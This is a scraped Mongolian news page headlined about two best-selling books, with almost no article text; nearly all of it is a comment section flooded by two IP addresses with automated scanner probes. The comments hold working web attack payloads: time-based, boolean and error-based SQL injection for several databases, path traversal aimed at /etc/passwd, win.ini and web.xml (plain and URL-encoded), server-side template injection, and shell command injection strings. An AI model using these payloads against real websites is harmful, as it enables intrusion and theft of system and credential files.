“Цагаан бороо”, “Цойлогсод” ном хамгийн эрэлттэй байна

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-05-21 20:07:28
Холбоотой мэдээ
Сэтгэгдлүүд
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 97 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(9))::text>'0 185.234.72.114 97 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 97 өдөр

  123456
 • admin"and(select*from(select+sleep(9))a/**/union/**/select+1)=" 185.234.72.114 97 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 97 өдөр

  123456
 • admin'and(select*from(select+sleep(9))a/**/union/**/select+1)=' 185.234.72.114 97 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 97 өдөр

  123456
 • admin"and"q"="z 185.234.72.114 97 өдөр

  123456
 • admin"and"y"="y 185.234.72.114 97 өдөр

  123456
 • admin'and's'='y 185.234.72.114 97 өдөр

  123456
 • admin'and'k'='k 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('t',9)='t
 • ../../../../WEB-INF/web.xml;admin 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('y',0)='y
 • admin 185.234.72.114 97 өдөр

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('v',9)
 • admin 185.234.72.114 97 өдөр

  123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('k',0)
 • ../../../../WEB-INF/web.xml 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:9
 • ../../../WEB-INF/web.xml;admin 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • ../../../WEB-INF/web.xml 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:9'/**/
 • ../../WEB-INF/web.xml;admin 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 185.234.72.114 97 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(9))::text>'0
 • ../../WEB-INF/web.xml 185.234.72.114 97 өдөр

  123456
 • ../WEB-INF/web.xml;admin 185.234.72.114 97 өдөр

  123456
 • ../WEB-INF/web.xml 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • WEB-INF/web.xml;admin 185.234.72.114 97 өдөр

  123456
 • WEB-INF/web.xml 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(9))>0/**/
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 185.234.72.114 97 өдөр

  123456"and(select*from(select+sleep(9))a/**/union/**/select+1)="
 • admin 185.234.72.114 97 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456'and(select*from(select+sleep(9))a/**/union/**/select+1)='
 • admin 185.234.72.114 97 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin'"\( 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • ../../../../../../Windows/win.iniadmin 185.234.72.114 97 өдөр

  123456
 • admin鎈'"\( 185.234.72.114 97 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1300599974')))>'0 185.234.72.114 97 өдөр

  123456
 • ./../../../../../../Windows/win.ini 185.234.72.114 97 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1546271460'))) 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456"and"n"="w
 • admin/**/and/**/cast(md5('1239166570')as/**/int)>0 185.234.72.114 97 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1933588155)as/**/int))>'0 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456"and"x"="x
 • extractvalue(1,concat(char(126),md5(1198690040))) 185.234.72.114 97 өдөр

  123456
 • ../../../../../../Windows/win.ini 185.234.72.114 97 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1054212134)))and" 185.234.72.114 97 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1061617287)))and' 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456'and'm'='g
 • admin 185.234.72.114 97 өдөр

  123456'"\(
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456'and'r'='r
 • admin 185.234.72.114 97 өдөр

  123456鎈'"\(
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456/**/and+4=6
 • admin 185.234.72.114 97 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1270578767')))>'0
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456/**/and+2=2
 • admin 185.234.72.114 97 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1594488267')))
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 185.234.72.114 97 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456/**/and/**/cast(md5('1385166811')as/**/int)>0
 • ..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456'and(select'1'from/**/cast(md5(1392529834)as/**/int))>'0
 • .\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  extractvalue(1,concat(char(126),md5(1924611112)))
 • ..\..\..\..\..\..\Windows\win.ini 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1144317257)))and"
 • admin 185.234.72.114 97 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1171798808)))and'
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 97 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 97 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 97 өдөр

  123456
 • <%- 979160659+926538596 %> 185.234.72.114 97 өдөр

  123456
 • #set($c=948308886+835547957)${c}$c 185.234.72.114 97 өдөр

  123456
 • %u2215etc%u2215passwd 185.234.72.114 97 өдөр

  123456
 • %2fetc%2fpasswd 185.234.72.114 97 өдөр

  123456
 • /etc/passwdadmin 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456
 • /etc/passwd 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456
 • ${(878775290+977950431)?c} 185.234.72.114 97 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 97 өдөр

  123456
 • '-var_dump(md5(820954386))-' 185.234.72.114 97 өдөр

  123456
 • expr 924374663 + 917522923 185.234.72.114 97 өдөр

  123456
 • admin&set /A 828532772+854625885 185.234.72.114 97 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 97 өдөр

  123456
 • ${@var_dump(md5(388118451))}; 185.234.72.114 97 өдөр

  123456
 • admin$(expr 805901265 + 865664581) 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456
 • ${960094211+834091455} 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  '-var_dump(md5(315833778))-'
 • ./../../../../../../etc/passwd 185.234.72.114 97 өдөр

  123456
 • /*1*/{{921359732+970247631}} 185.234.72.114 97 өдөр

  123456
 • ../../../../../../etc/passwdadmin 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  <%- 854000618+908838525 %>
 • admin 185.234.72.114 97 өдөр

  ${@var_dump(md5(631111534))};
 • ../../../../../../etc/passwd 185.234.72.114 97 өдөр

  123456
 • admin|expr 904685714 + 991753767 185.234.72.114 97 өдөр

  123456
 • admin expr 937836340 + 934926018 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  #set($c=805565090+801950801)${c}$c
 • admin 185.234.72.114 97 өдөр

  123456
 • ntfpdlpbhwnlrphpgatb 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  ${(895534033+926258476)?c}
 • admin 185.234.72.114 97 өдөр

  expr 832015811 + 865835123
 • admin 185.234.72.114 97 өдөр

  123456&set /A 879874779+918804809
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456$(expr 956332650 + 875936309)
 • admin 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  ntfpdlpbhwnlrphpgatb
 • admin 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  ${961851980+937659815}
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456|expr 894396151 + 904326782
 • ${838255940+869996651} 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  /*1*/{{877619518+902641980}}
 • admin 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456 expr 827542273 + 891594520
 • admin 185.234.72.114 97 өдөр

  ${967906500+994654497}
 • admin 185.234.72.114 97 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 194.163.191.42 132 өдөр

  123456/**/and+0=6
 • ../../../../WEB-INF/web.xml 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456/**/and+2=2
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 132 өдөр

  123456
 • ../../../WEB-INF/web.xml 194.163.191.42 132 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 194.163.191.42 132 өдөр

  123456
 • ../../WEB-INF/web.xml 194.163.191.42 132 өдөр

  123456
 • ../WEB-INF/web.xml;admin 194.163.191.42 132 өдөр

  123456
 • ../WEB-INF/web.xml 194.163.191.42 132 өдөр

  123456
 • WEB-INF/web.xml;admin 194.163.191.42 132 өдөр

  123456
 • WEB-INF/web.xml 194.163.191.42 132 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 132 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 132 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 132 өдөр

  123456
 • ./../../../../../../Windows/win.ini 194.163.191.42 132 өдөр

  123456
 • ../../../../../../Windows/win.ini 194.163.191.42 132 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 132 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 132 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 132 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 132 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('k',18)='k 194.163.191.42 132 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 132 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 132 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 132 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 132 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('a',0)='a 194.163.191.42 132 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:18 194.163.191.42 132 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 132 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(18))::text>'0 194.163.191.42 132 өдөр

  123456
 • expr 981053671 + 981387445 194.163.191.42 132 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 132 өдөр

  123456
 • admin&set /A 976989104+834504799 194.163.191.42 132 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 132 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 132 өдөр

  123456
 • admin$(expr 857012566 + 866100877) 194.163.191.42 132 өдөр

  123456
 • admin"and(select*from(select+sleep(18))a/**/union/**/select+1)=" 194.163.191.42 132 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 132 өдөр

  123456
 • admin|expr 948801451 + 916943405 194.163.191.42 132 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 132 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 132 өдөр

  123456
 • admin expr 930662765 + 841150431 194.163.191.42 132 өдөр

  123456
 • admin'and(select*from(select+sleep(18))a/**/union/**/select+1)=' 194.163.191.42 132 өдөр

  123456
 • %2fetc%2fpasswd 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  expr 862877095 + 838440380
 • /etc/passwdadmin 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  <%- 910900667+898783897 %>
 • admin 194.163.191.42 132 өдөр

  123456&set /A 846745972+809597022
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  #set($c=866548114+864967991)${c}$c
 • admin 194.163.191.42 132 өдөр

  123456$(expr 947200709 + 886880917)
 • admin 194.163.191.42 132 өдөр

  ${(984938082+824464013)?c}
 • admin 194.163.191.42 132 өдөр

  123456
 • /etc/passwd 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456|expr 988414511 + 847179779
 • admin 194.163.191.42 132 өдөр

  ${981148034+805223785}
 • admin 194.163.191.42 132 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456 expr 895574886 + 899126537
 • admin 194.163.191.42 132 өдөр

  /*1*/{{863518658+918788763}}
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 132 өдөр

  123456
 • ./../../../../../../etc/passwd 194.163.191.42 132 өдөр

  123456
 • ../../../../../../etc/passwdadmin 194.163.191.42 132 өдөр

  123456
 • '-var_dump(md5(170542449))-' 194.163.191.42 132 өдөр

  123456
 • ../../../../../../etc/passwd 194.163.191.42 132 өдөр

  123456
 • admin"and"g"="x 194.163.191.42 132 өдөр

  123456
 • admin"and"a"="a 194.163.191.42 132 өдөр

  123456
 • admin'and's'='o 194.163.191.42 132 өдөр

  123456
 • ${@var_dump(md5(910495647))}; 194.163.191.42 132 өдөр

  123456
 • admin'and'r'='r 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  '-var_dump(md5(239534462))-'
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  rvmnimujmpariisadxgm
 • admin 194.163.191.42 132 өдөр

  123456
 • <%- 974068509+944809808 %> 194.163.191.42 132 өдөр

  123456
 • ${828276111+859893224} 194.163.191.42 132 өдөр

  123456
 • #set($c=869897485+992268891)${c}$c 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  ${@var_dump(md5(253341205))};
 • admin 194.163.191.42 132 өдөр

  ${864546838+956600626}
 • ${(903873552+991404646)?c} 194.163.191.42 132 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 132 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456
 • ${862001603+868580087} 194.163.191.42 132 өдөр

  123456
 • rvmnimujmpariisadxgm 194.163.191.42 132 өдөр

  123456
 • /*1*/{{829515319+875282761}} 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456